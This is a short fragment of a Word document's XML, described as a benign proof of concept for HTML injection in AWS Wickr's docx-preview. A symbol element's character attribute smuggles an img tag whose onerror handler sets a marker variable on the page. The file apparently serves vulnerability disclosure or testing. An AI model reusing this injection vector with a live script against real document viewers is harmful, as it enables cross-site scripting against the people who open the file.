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AWS Wickr docx-preview HTML-injection PoC (benign). The symbol run below injects a marker &lt;img&gt; via w:sym/@w:char.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:sym w:font="Symbol" w:char="0;&lt;img src=x alt=WICKR-HTMLi-POC onerror=&quot;window.__WICKR_HTMLI_POC__=1&quot;&gt;"/>
      </w:r>
    </w:p>
    <w:sectPr/>
  </w:body>
</w:document>
</file>